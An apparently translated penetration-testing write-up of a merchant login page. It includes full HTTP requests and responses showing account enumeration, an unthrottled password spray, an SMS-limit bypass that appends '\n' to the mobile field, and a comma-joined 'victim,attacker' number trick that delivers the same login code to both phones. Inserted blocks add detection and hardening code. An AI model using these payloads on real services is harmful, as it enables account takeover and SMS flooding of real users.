安全矩阵
An interesting approach to hunting mobile verification-code bugs

Posted on 2022-1-14 09:25:15
This post was last edited by Delina on 2022-1-14 09:27.

Original article: An interesting approach to hunting mobile verification-code bugs

I. Background
The login interface under test looks as follows.
Account/password login:

Mobile verification-code login:

The account used for account/password login is known to be the mobile number.
II. Details
1. Account/password login
Enter an arbitrary account and password; the response says the mobile number is not registered.

Capture the traffic with Burp; the request and response are as follows.

This prompt gives clue 1: the account is a mobile number.
Entering the classic number 18888888888, the response shows that this account exists, which gives clue 2: a valid account.
  POST /merchant/account/loginByPassword HTTP/1.1
  Host: merchant.xxx.net
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  Accept: application/json, text/plain, */*
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Content-Type: application/json;charset=utf-8
  Clientid: web
  Authorization: [object Object]
  Token: [object Object]
  Content-Length: 41
  Origin: https://www.xxx.net
  Referer: https://www.xxx.net/
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-site
  Te: trailers
  Connection: close

  {"mobile":"18888888888","password":"222"}


  HTTP/1.1 200
  Date: Tue, 28 Dec 2021 10:48:40 GMT
  Content-Type: application/json
  Connection: close
  Set-Cookie: acw_tc=2760824d16406885206401191e2c1dd84766a8b1a792d2e2bb2ce3399d15a5;path=/;HttpOnly;Max-Age=1800
  Server: Tengine/2.1.2
  Vary: Accept-Encoding
  Access-Control-Allow-Credentials: true
  Access-Control-Allow-Origin: https://www.xxx.net
  Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  Content-Length: 120

  {"status":999999,"code":999999,"err":"用户名或密码错误,该账号还可重试4次","data":null,"success":false}

Testing showed no limit on the number of attempts.
Clue 1 + clue 2 = attack path 1: brute-force with a mobile-number dictionary and identify existing accounts from the response content, then try 5 weak passwords per account in bulk to get into the system.
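The two signals from this section (many different mobile numbers answered "not registered" from one client, and more wrong-password attempts on one account than the application's own "4 more tries" message allows) are easy to surface from authentication logs. The following is an added example, not code from the original post or from the application under test; the log format, the `result` field and all log lines are constructed for the demo and would have to be mapped onto a real deployment's own auth log fields.

```python
"""Added example: flag account enumeration and password spraying against a
loginByPassword-style endpoint. Log format and values are constructed."""
import re
from collections import defaultdict

# Constructed log lines in a hypothetical key=value format. `result` is a
# hypothetical field recording why a login failed (not_registered,
# bad_password) or that it succeeded (ok).
SAMPLE_LOG = """\
ts=10:48:40 ip=203.0.113.5 mobile=13800000001 result=not_registered
ts=10:48:40 ip=203.0.113.5 mobile=13800000002 result=not_registered
ts=10:48:41 ip=203.0.113.5 mobile=13800000003 result=not_registered
ts=10:48:41 ip=203.0.113.5 mobile=18888888888 result=bad_password
ts=10:48:42 ip=203.0.113.5 mobile=13800000004 result=not_registered
ts=10:48:42 ip=203.0.113.5 mobile=18888888888 result=bad_password
ts=10:48:43 ip=203.0.113.5 mobile=18888888888 result=bad_password
ts=10:48:43 ip=203.0.113.5 mobile=18888888888 result=bad_password
ts=10:48:44 ip=203.0.113.5 mobile=18888888888 result=bad_password
ts=10:49:00 ip=198.51.100.9 mobile=16666666666 result=ok
ts=10:49:05 ip=198.51.100.9 mobile=16666666666 result=bad_password
"""

LINE_RE = re.compile(r"ts=(\S+) ip=(\S+) mobile=(\S+) result=(\S+)")


def parse(log_text):
    """Turn the constructed log text into a list of event dicts; skip malformed lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.fullmatch(line.strip())
        if m:
            ts, ip, mobile, result = m.groups()
            events.append({"ts": ts, "ip": ip, "mobile": mobile, "result": result})
    return events


def enumeration_suspects(events, min_distinct=3):
    """Clue-1 abuse: one client collecting 'not registered' answers for many
    different numbers is enumerating accounts, not mistyping its own login."""
    probed = defaultdict(set)
    for e in events:
        if e["result"] == "not_registered":
            probed[e["ip"]].add(e["mobile"])
    return {ip: len(nums) for ip, nums in probed.items() if len(nums) >= min_distinct}


def spray_suspects(events, max_failures=5):
    """Clue-2 abuse: the application's own message promises a lockout after
    4 more tries, so 5 or more wrong-password attempts on one account from one
    client means either the lockout fired (fine) or it does not exist."""
    failures = defaultdict(int)
    for e in events:
        if e["result"] == "bad_password":
            failures[(e["ip"], e["mobile"])] += 1
    return {k: n for k, n in failures.items() if n >= max_failures}


def analyse(log_text=SAMPLE_LOG):
    events = parse(log_text)
    return {"enumeration": enumeration_suspects(events), "spray": spray_suspects(events)}


if __name__ == "__main__":
    print(analyse())
```

The thresholds are deliberately low for the sample; in production they would be tuned per window, and the mitigation on the application side is the same in both cases: return one generic "username or password incorrect" message whether or not the number exists, and enforce the advertised attempt limit server-side.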
2. Mobile login test
Enter a mobile number and click "get verification code".
Request sent:
  POST /merchant/account/sendSmsCodeForLogin HTTP/1.1
  Host: merchant.xxx.net
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  Accept: application/json, text/plain, */*
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Content-Type: application/json;charset=utf-8
  Clientid: web
  Authorization: [object Object]
  Token: [object Object]
  Content-Length: 24
  Origin: https://www.xxx.net
  Referer: https://www.xxx.net/
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-site
  Te: trailers
  Connection: close

  {"mobile":"18888888888"}

Response received:
  HTTP/1.1 200
  Date: Tue, 28 Dec 2021 10:57:48 GMT
  Content-Type: application/json
  Connection: close
  Set-Cookie: acw_tc=2760820516406890685573135e310db030eef4f8c8c2014c8eac375434e045;path=/;HttpOnly;Max-Age=1800
  Server: Tengine/2.1.2
  Vary: Accept-Encoding
  Access-Control-Allow-Credentials: true
  Access-Control-Allow-Origin: https://www.xxx.net
  Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  Content-Length: 59

  {"status":0,"code":0,"err":null,"data":null,"success":true}

From this response the verification code was presumably sent successfully.
Sending the request again gives the following response:
  HTTP/1.1 200
  Date: Tue, 28 Dec 2021 10:57:51 GMT
  Content-Type: application/json
  Connection: close
  Set-Cookie: acw_tc=2760820f16406890715673508e598e9180d08a0a3810cf50015a47726b17fd;path=/;HttpOnly;Max-Age=1800
  Server: Tengine/2.1.2
  Vary: Accept-Encoding
  Access-Control-Allow-Credentials: true
  Access-Control-Allow-Origin: https://www.xxx.net
  Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  Content-Length: 104

  {"status":999999,"code":999999,"err":"每分钟只能发送一次验证码","data":null,"success":false}

The response shows that a send limit exists. To try to bypass it, change the request body to {"mobile":"18888888888\n"} and replay:
  POST /merchant/account/sendSmsCodeForLogin HTTP/1.1
  Host: merchant.xxx.net
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  Accept: application/json, text/plain, */*
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Content-Type: application/json;charset=utf-8
  Clientid: web
  Authorization: [object Object]
  Token: [object Object]
  Content-Length: 24
  Origin: https://www.xxx.net
  Referer: https://www.xxx.net/
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-site
  Te: trailers
  Connection: close

  {"mobile":"18888888888\n"}

Response received:
  HTTP/1.1 200
  Date: Tue, 28 Dec 2021 10:57:48 GMT
  Content-Type: application/json
  Connection: close
  Set-Cookie: acw_tc=2760820516406890685573135e310db030eef4f8c8c2014c8eac375434e045;path=/;HttpOnly;Max-Age=1800
  Server: Tengine/2.1.2
  Vary: Accept-Encoding
  Access-Control-Allow-Credentials: true
  Access-Control-Allow-Origin: https://www.xxx.net
  Access-Control-Allow-Methods: GET, POST, DELETE, PUT, OPTIONS
  Access-Control-Allow-Headers: host,x-real-ip,x-forwarded-for,connection,content-length,user-agent,x-true-ip,web-server-type,wl-proxy-client-ip,x-forwarded-proto,x-forwarded-cluster,eagleeye-traceid,accept,accept-language,accept-encoding,content-type,clientid,authorization,token,origin,referer,sec-fetch-dest,sec-fetch-mode,sec-fetch-site,eagleeye-rpcid,x-sinfo,x5-uuid,token,clientid,clientId,Authorization,Content-Type
  Content-Length: 59

  {"status":0,"code":0,"err":null,"data":null,"success":true}

Keep modifying the body, e.g. {"mobile":"18888888888\n\n"}.
Each replay keeps returning success.
Replacing it with a real mobile number confirms an SMS bomb.
Now try a new trick: change the request to two different mobile numbers.
  POST /merchant/account/sendSmsCodeForLogin HTTP/1.1
  Host: merchant.xxx.net
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  Accept: application/json, text/plain, */*
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Content-Type: application/json;charset=utf-8
  Clientid: web
  Authorization: [object Object]
  Token: [object Object]
  Content-Length: 24
  Origin: https://www.xxx.net
  Referer: https://www.xxx.net/
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-site
  Te: trailers
  Connection: close

  {"mobile":"18888888888,16666666666"}

The response reports success.

Replacing them with real mobile numbers, both phones receive the same verification code.

So all it takes is to put an existing user's number first and your own number second, click send, and you receive the same code, which gives arbitrary user login.
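Both tricks in this section come down to the same server-side mistake: the rate limit is keyed on the raw `mobile` string and the string is only cleaned up and split afterwards, when it reaches the SMS gateway. The block below is an added example, not the original post's code and not the application's real handler; it models a `sendSmsCodeForLogin`-style handler in the vulnerable shape and beside it a hardened version, with a constructed in-memory gateway and rate-limit store, and an assumed mainland mobile-number format.

```python
"""Added example: a minimal model of a 'send SMS login code' handler in its
vulnerable form and a hardened form. Gateway, store and number format are
constructed/assumed for this demo."""
import re
import secrets

MOBILE_RE = re.compile(r"1[3-9]\d{9}")  # assumed mainland CN mobile format
WINDOW = 60                               # one code per minute, as the page's error says


class FakeGateway:
    """Constructed stand-in for the SMS provider: records (recipient, code) pairs."""
    def __init__(self):
        self.sent = []

    def send(self, recipient, code):
        self.sent.append((recipient, code))


def vulnerable_send_code(body, last_sent, gateway, now, code="123456"):
    raw = body.get("mobile", "")
    # Rate limit keyed on the raw string: "18888888888\n" is a different key
    # from "18888888888", so every extra "\n" buys another send.
    if now - last_sent.get(raw, -WINDOW) < WINDOW:
        return {"status": 999999, "err": "每分钟只能发送一次验证码", "success": False}
    last_sent[raw] = now
    # Normalisation happens only now, after the throttle, and splitting on ","
    # delivers the same code to every number in the list.
    for number in raw.strip().split(","):
        gateway.send(number.strip(), code)
    return {"status": 0, "err": None, "success": True}


def hardened_send_code(body, last_sent, gateway, now):
    raw = body.get("mobile")
    # 1. Validate first, with no trimming or splitting: exactly one well-formed
    #    number or the request is rejected before any state is touched.
    #    fullmatch, not search() with '$': '$' would accept a trailing newline.
    if not isinstance(raw, str) or not MOBILE_RE.fullmatch(raw):
        return {"status": 999999, "err": "invalid mobile", "success": False}
    # 2. Throttle on the validated canonical value, so every spelling of one
    #    recipient shares a single bucket.
    if now - last_sent.get(raw, -WINDOW) < WINDOW:
        return {"status": 999999, "err": "每分钟只能发送一次验证码", "success": False}
    last_sent[raw] = now
    # 3. Fresh unpredictable code per request, bound to that single recipient.
    gateway.send(raw, f"{secrets.randbelow(10**6):06d}")
    return {"status": 0, "err": None, "success": True}


def replay_bypass(handler):
    """Send at t=0, then at t=1 with a trailing newline.
    Returns (first_ok, second_ok, number_of_sms_actually_sent)."""
    gw, store = FakeGateway(), {}
    first = handler({"mobile": "18888888888"}, store, gw, now=0)["success"]
    second = handler({"mobile": "18888888888\n"}, store, gw, now=1)["success"]
    return first, second, len(gw.sent)


def two_number_trick(handler):
    """One request naming two numbers.
    Returns (accepted, recipients, both_got_the_same_code)."""
    gw, store = FakeGateway(), {}
    ok = handler({"mobile": "18888888888,16666666666"}, store, gw, now=0)["success"]
    recipients = [r for r, _ in gw.sent]
    same_code = len(gw.sent) == 2 and len({c for _, c in gw.sent}) == 1
    return ok, recipients, same_code


if __name__ == "__main__":
    print("vulnerable:", replay_bypass(vulnerable_send_code), two_number_trick(vulnerable_send_code))
    print("hardened:  ", replay_bypass(hardened_send_code), two_number_trick(hardened_send_code))
```

The order of operations is the whole fix: validate the field as a single canonical value, throttle on that value, and only then hand it to the gateway. A throttle placed after normalisation but with a lenient parser would still let a comma-separated list through, which is why the hardened version refuses anything that is not exactly one number rather than trying to clean it.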

III. Summary
Vulnerability 1 (common): brute force --- enumerate usernames, brute-force passwords
Vulnerability 2 (common): SMS bomb --- bypass the send limit with characters such as \n, \r
Vulnerability 3 (highlight): arbitrary user login --- submit two mobile numbers at once to receive the same verification code

